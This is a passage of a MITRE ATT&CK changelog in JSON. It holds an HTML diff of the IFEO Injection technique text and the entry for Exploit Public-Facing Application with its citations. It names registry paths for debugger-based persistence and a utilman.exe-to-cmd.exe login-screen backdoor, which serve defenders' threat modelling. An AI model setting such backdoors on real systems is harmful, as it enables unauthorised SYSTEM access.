nowrap=\"nowrap\">ges&nbsp;by&nbsp;executing&nbsp;malicious&nbsp;content&nbsp;triggered&nbsp;by&nbsp;Image&nbsp;File&nbsp;E</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xecution&nbsp;Options&nbsp;(IFEO)&nbsp;debuggers.&nbsp;IFEOs&nbsp;enable&nbsp;a&nbsp;developer&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">xecution&nbsp;Options&nbsp;(IFEO)&nbsp;debuggers.&nbsp;IFEOs&nbsp;enable&nbsp;a&nbsp;developer&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;attach&nbsp;a&nbsp;debugger&nbsp;to&nbsp;an&nbsp;application.&nbsp;When&nbsp;a&nbsp;process&nbsp;is&nbsp;cr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;attach&nbsp;a&nbsp;debugger&nbsp;to&nbsp;an&nbsp;application.&nbsp;When&nbsp;a&nbsp;process&nbsp;is&nbsp;cr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eated,&nbsp;a&nbsp;debugger&nbsp;present&nbsp;in&nbsp;an&nbsp;application\u2019s&nbsp;IFEO&nbsp;will&nbsp;be&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eated,&nbsp;a&nbsp;debugger&nbsp;present&nbsp;in&nbsp;an&nbsp;application\u2019s&nbsp;IFEO&nbsp;will&nbsp;be&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">repended&nbsp;to&nbsp;the&nbsp;application\u2019s&nbsp;name,&nbsp;effectively&nbsp;launching&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">repended&nbsp;to&nbsp;the&nbsp;application\u2019s&nbsp;name,&nbsp;effectively&nbsp;launching&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;new&nbsp;process&nbsp;under&nbsp;the&nbsp;debugger&nbsp;(e.g.,&nbsp;&lt;code&gt;C:\\dbg\\ntsd.ex</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;new&nbsp;process&nbsp;under&nbsp;the&nbsp;debugger&nbsp;(e.g.,&nbsp;&lt;code&gt;C:\\dbg\\ntsd.ex</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;-g&nbsp;&nbsp;notepad.exe&lt;/code&gt;).<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Microsoft&nbsp;Dev&nbsp;Blog&nbsp;IFE</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;-g&nbsp;&nbsp;notepad.exe&lt;/code&gt;).(Citation:&nbsp;Microsoft&nbsp;Dev&nbsp;Blog&nbsp;IFEO</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">O&nbsp;Mar&nbsp;2010)&nbsp;&nbsp;IFEOs&nbsp;can&nbsp;be&nbsp;set&nbsp;directly&nbsp;via&nbsp;the&nbsp;Registry&nbsp;or&nbsp;i</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Mar&nbsp;2010)&nbsp;&nbsp;IFEOs&nbsp;can&nbsp;be&nbsp;set&nbsp;directly&nbsp;via&nbsp;the&nbsp;Registry&nbsp;or&nbsp;in</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;Global&nbsp;Flags&nbsp;via&nbsp;the&nbsp;GFlags&nbsp;tool.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Microsoft&nbsp;GFl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Global&nbsp;Flags&nbsp;via&nbsp;the&nbsp;GFlags&nbsp;tool.(Citation:&nbsp;Microsoft&nbsp;GFlag</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ags&nbsp;Mar&nbsp;2017)&nbsp;IFEOs&nbsp;are&nbsp;represented&nbsp;as&nbsp;&lt;code&gt;Debugger&lt;/code&gt;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;Mar&nbsp;2017)&nbsp;IFEOs&nbsp;are&nbsp;represented&nbsp;as&nbsp;&lt;code&gt;Debugger&lt;/code&gt;&nbsp;v</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;values&nbsp;in&nbsp;the&nbsp;Registry&nbsp;under&nbsp;&lt;code&gt;HKLM\\SOFTWARE{\\Wow6432No</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">alues&nbsp;in&nbsp;the&nbsp;Registry&nbsp;under&nbsp;&lt;code&gt;HKLM\\SOFTWARE{\\Wow6432Node</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">de}\\Microsoft\\Windows&nbsp;NT\\CurrentVersion\\Image&nbsp;File&nbsp;Execution</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">}\\Microsoft\\Windows&nbsp;NT\\CurrentVersion\\Image&nbsp;File&nbsp;Execution&nbsp;O</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Options\\&lt;executable&gt;&lt;/code&gt;&nbsp;where&nbsp;&lt;code&gt;&amp;lt;executable&amp;gt;&lt;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ptions\\&lt;executable&gt;&lt;/code&gt;&nbsp;where&nbsp;&lt;code&gt;&amp;lt;executable&amp;gt;&lt;/c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/code&gt;&nbsp;is&nbsp;the&nbsp;binary&nbsp;on&nbsp;which&nbsp;the&nbsp;debugger&nbsp;is&nbsp;attached.<span class=\"diff_sub\">&nbsp;</span>(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ode&gt;&nbsp;is&nbsp;the&nbsp;binary&nbsp;on&nbsp;which&nbsp;the&nbsp;debugger&nbsp;is&nbsp;attached.(Citati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Microsoft&nbsp;Dev&nbsp;Blog&nbsp;IFEO&nbsp;Mar&nbsp;2010)&nbsp;&nbsp;IFEOs&nbsp;can&nbsp;also&nbsp;ena</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;Microsoft&nbsp;Dev&nbsp;Blog&nbsp;IFEO&nbsp;Mar&nbsp;2010)&nbsp;&nbsp;IFEOs&nbsp;can&nbsp;also&nbsp;enable</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ble&nbsp;an&nbsp;arbitrary&nbsp;monitor&nbsp;program&nbsp;to&nbsp;be&nbsp;launched&nbsp;when&nbsp;a&nbsp;speci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;an&nbsp;arbitrary&nbsp;monitor&nbsp;program&nbsp;to&nbsp;be&nbsp;launched&nbsp;when&nbsp;a&nbsp;specifie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fied&nbsp;program&nbsp;silently&nbsp;exits&nbsp;(i.e.&nbsp;is&nbsp;prematurely&nbsp;terminated&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;program&nbsp;silently&nbsp;exits&nbsp;(i.e.&nbsp;is&nbsp;prematurely&nbsp;terminated&nbsp;by&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">by&nbsp;itself&nbsp;or&nbsp;a&nbsp;second,&nbsp;non&nbsp;kernel-mode&nbsp;process).<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itself&nbsp;or&nbsp;a&nbsp;second,&nbsp;non&nbsp;kernel-mode&nbsp;process).(Citation:&nbsp;Micr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Microsoft&nbsp;Silent&nbsp;Process&nbsp;Exit&nbsp;NOV&nbsp;2017)<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Oddvar&nbsp;Mo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">osoft&nbsp;Silent&nbsp;Process&nbsp;Exit&nbsp;NOV&nbsp;2017)(Citation:&nbsp;Oddvar&nbsp;Moe&nbsp;IFE</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;IFEO&nbsp;APR&nbsp;2018)&nbsp;Similar&nbsp;to&nbsp;debuggers,&nbsp;silent&nbsp;exit&nbsp;monitorin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">O&nbsp;APR&nbsp;2018)&nbsp;Similar&nbsp;to&nbsp;debuggers,&nbsp;silent&nbsp;exit&nbsp;monitoring&nbsp;can</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;can&nbsp;be&nbsp;enabled&nbsp;through&nbsp;GFlags&nbsp;and/or&nbsp;by&nbsp;directly&nbsp;modifying</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;be&nbsp;enabled&nbsp;through&nbsp;GFlags&nbsp;and/or&nbsp;by&nbsp;directly&nbsp;modifying&nbsp;IFEO</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;IFEO&nbsp;and&nbsp;silent&nbsp;process&nbsp;exit&nbsp;Registry&nbsp;values&nbsp;in&nbsp;&lt;code&gt;HKEY_</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;silent&nbsp;process&nbsp;exit&nbsp;Registry&nbsp;values&nbsp;in&nbsp;&lt;code&gt;HKEY_LOCAL</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows&nbsp;NT\\CurrentVersion\\S</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">_MACHINE\\SOFTWARE\\Microsoft\\Windows&nbsp;NT\\CurrentVersion\\Silent</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ilentProcessExit\\&lt;/code&gt;.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Microsoft&nbsp;Silent&nbsp;Proces</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ProcessExit\\&lt;/code&gt;.(Citation:&nbsp;Microsoft&nbsp;Silent&nbsp;Process&nbsp;Exit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;Exit&nbsp;NOV&nbsp;2017)<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Oddvar&nbsp;Moe&nbsp;IFEO&nbsp;APR&nbsp;2018)&nbsp;&nbsp;Simil</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;NOV&nbsp;2017)(Citation:&nbsp;Oddvar&nbsp;Moe&nbsp;IFEO&nbsp;APR&nbsp;2018)&nbsp;&nbsp;Similar&nbsp;to&nbsp;[</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ar&nbsp;to&nbsp;[Accessibility&nbsp;Features](https://attack.mitre.org/tech</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Accessibility&nbsp;Features](https://attack.mitre.org/techniques/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">niques/T1546/008),&nbsp;on&nbsp;Windows&nbsp;Vista&nbsp;and&nbsp;later&nbsp;as&nbsp;well&nbsp;as&nbsp;Win</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T1546/008),&nbsp;on&nbsp;Windows&nbsp;Vista&nbsp;and&nbsp;later&nbsp;as&nbsp;well&nbsp;as&nbsp;Windows&nbsp;Se</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dows&nbsp;Server&nbsp;2008&nbsp;and&nbsp;later,&nbsp;a&nbsp;Registry&nbsp;key&nbsp;may&nbsp;be&nbsp;modified&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rver&nbsp;2008&nbsp;and&nbsp;later,&nbsp;a&nbsp;Registry&nbsp;key&nbsp;may&nbsp;be&nbsp;modified&nbsp;that&nbsp;con</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hat&nbsp;configures&nbsp;\"cmd.exe,\"&nbsp;or&nbsp;another&nbsp;program&nbsp;that&nbsp;provides&nbsp;b</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">figures&nbsp;\"cmd.exe,\"&nbsp;or&nbsp;another&nbsp;program&nbsp;that&nbsp;provides&nbsp;backdoor</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ackdoor&nbsp;access,&nbsp;as&nbsp;a&nbsp;\"debugger\"&nbsp;for&nbsp;an&nbsp;accessibility&nbsp;program</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;access,&nbsp;as&nbsp;a&nbsp;\"debugger\"&nbsp;for&nbsp;an&nbsp;accessibility&nbsp;program&nbsp;(ex:&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;(ex:&nbsp;utilman.exe).&nbsp;After&nbsp;the&nbsp;Registry&nbsp;is&nbsp;modified,&nbsp;pressing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tilman.exe).&nbsp;After&nbsp;the&nbsp;Registry&nbsp;is&nbsp;modified,&nbsp;pressing&nbsp;the&nbsp;ap</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;the&nbsp;appropriate&nbsp;key&nbsp;combination&nbsp;at&nbsp;the&nbsp;login&nbsp;screen&nbsp;while&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">propriate&nbsp;key&nbsp;combination&nbsp;at&nbsp;the&nbsp;login&nbsp;screen&nbsp;while&nbsp;at&nbsp;the&nbsp;k</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;the&nbsp;keyboard&nbsp;or&nbsp;when&nbsp;connected&nbsp;with&nbsp;[Remote&nbsp;Desktop&nbsp;Protoc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eyboard&nbsp;or&nbsp;when&nbsp;connected&nbsp;with&nbsp;[Remote&nbsp;Desktop&nbsp;Protocol](htt</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ol](https://attack.mitre.org/techniques/T1021/001)&nbsp;will&nbsp;caus</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/techniques/T1021/001)&nbsp;will&nbsp;cause&nbsp;the&nbsp;\"</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;the&nbsp;\"debugger\"&nbsp;program&nbsp;to&nbsp;be&nbsp;executed&nbsp;with&nbsp;SYSTEM&nbsp;privileg</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">debugger\"&nbsp;program&nbsp;to&nbsp;be&nbsp;executed&nbsp;with&nbsp;SYSTEM&nbsp;privileges.(Cit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Tilbury&nbsp;2014)&nbsp;&nbsp;Similar&nbsp;to&nbsp;[Process&nbsp;Injection]</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation:&nbsp;Tilbury&nbsp;2014)&nbsp;&nbsp;Similar&nbsp;to&nbsp;[Process&nbsp;Injection](https:/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/techniques/T1055),&nbsp;these&nbsp;values&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/attack.mitre.org/techniques/T1055),&nbsp;these&nbsp;values&nbsp;may&nbsp;also&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;be&nbsp;abused&nbsp;to&nbsp;obtain&nbsp;privilege&nbsp;escalation&nbsp;by&nbsp;causing&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;abused&nbsp;to&nbsp;obtain&nbsp;privilege&nbsp;escalation&nbsp;by&nbsp;causing&nbsp;a&nbsp;malicio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;malicious&nbsp;executable&nbsp;to&nbsp;be&nbsp;loaded&nbsp;and&nbsp;run&nbsp;in&nbsp;the&nbsp;context&nbsp;of</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;executable&nbsp;to&nbsp;be&nbsp;loaded&nbsp;and&nbsp;run&nbsp;in&nbsp;the&nbsp;context&nbsp;of&nbsp;separat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;separate&nbsp;processes&nbsp;on&nbsp;the&nbsp;computer.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Elastic&nbsp;Proc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;processes&nbsp;on&nbsp;the&nbsp;computer.(Citation:&nbsp;Elastic&nbsp;Process&nbsp;Injec</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ess&nbsp;Injection&nbsp;July&nbsp;2017)&nbsp;Installing&nbsp;IFEO&nbsp;mechanisms&nbsp;may&nbsp;also</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;July&nbsp;2017)&nbsp;Installing&nbsp;IFEO&nbsp;mechanisms&nbsp;may&nbsp;also&nbsp;provide&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;provide&nbsp;Persistence&nbsp;via&nbsp;continuous&nbsp;triggered&nbsp;invocation.&nbsp;&nbsp;M</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Persistence&nbsp;via&nbsp;continuous&nbsp;triggered&nbsp;invocation.&nbsp;&nbsp;Malware&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">alware&nbsp;may&nbsp;also&nbsp;use&nbsp;IFEO&nbsp;to&nbsp;<span class=\"diff_chg\">[Impair&nbsp;D</span>efenses<span class=\"diff_chg\">](https://attack</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;use&nbsp;IFEO&nbsp;to&nbsp;<span class=\"diff_chg\">impair&nbsp;d</span>efenses<span class=\"diff_chg\">&nbsp;by&nbsp;registering</span>&nbsp;invalid&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">.mitre.org/techniques/T1562)&nbsp;by&nbsp;registering</span>&nbsp;invalid&nbsp;debugger</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">buggers&nbsp;that&nbsp;redirect&nbsp;and&nbsp;effectively&nbsp;disable&nbsp;various&nbsp;system</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;that&nbsp;redirect&nbsp;and&nbsp;effectively&nbsp;disable&nbsp;various&nbsp;system&nbsp;and&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;and&nbsp;security&nbsp;applications.(Citation:&nbsp;FSecure&nbsp;Hupigon)(Citat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ecurity&nbsp;applications.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;FSecure&nbsp;Hupigon)<span class=\"diff_sub\">&nbsp;</span>(Citation:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;Symantec&nbsp;Ushedix&nbsp;June&nbsp;2008)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Symantec&nbsp;Ushedix&nbsp;June&nbsp;2008)</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0422: Detection Strategy for IFEO Injection on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2025-10-24 17:48:41.788000+00:00",
                    "name": "Exploit Public-Facing Application",
                    "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1190",
                            "external_id": "T1190"
                        },
                        {
                            "source_name": "CWE top 25",
                            "description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.",
                            "url": "https://cwe.mitre.org/top25/index.html"
                        },
                        {
                            "source_name": "CIS Multiple SMB Vulnerabilities",
                            "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.",
                            "url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/"
                        },
                        {
                            "source_name": "Ars Technica VMWare Code Execution Vulnerability 2021",
                            "description": "Dan Goodin . (2021, February 25). Code-execution flaw in VMware has a severity rating of 9.8 out of 10. Retrieved April 8, 2025.",
                            "url": "https://arstechnica.com/information-technology/2021/02/armed-with-exploits-hackers-on-the-prowl-for-a-critical-vmware-vulnerability/"
                        },
                        {
                            "source_name": "Recorded Future ESXiArgs Ransomware 2023",
                            "description": "German Hoeffner, Aaron Soehnen and Gianni Perez. (2023, February 7). ESXiArgs Ransomware Targets Publicly-Exposed ESXi OpenSLP Servers. Retrieved March 26, 2025.",
                            "url": "https://www.recordedfuture.com/blog/esxiargs-ransomware-targets-vmware-esxi-openslp-servers"
                        },
                        {
                            "source_name": "Wired Russia Cyberwar",
                            "description": "Greenberg, A. (2022, November 10). Russia\u2019s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.",
                            "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/"
                        },
                        {
                            "source_name": "Mandiant Fortinet Zero Day",
                            "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.",
                            "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"
                        },
                        {
                            "source_name": "NVD CVE-2016-6662",
                            "description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.",
                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662"
                        },
                        {
                            "source_name": "NVD CVE-2014-7169",
                            "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.",
                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        },
                        {
                            "source_name": "OWASP Top 10",
                            "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.",
                            "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
                        },
                        {
                            "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018",
                            "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Praetorian",
                        "Yossi Weizman, Azure Defender Research Team",
                        "Don Le, Stifel Financial"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "IaaS",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.8",
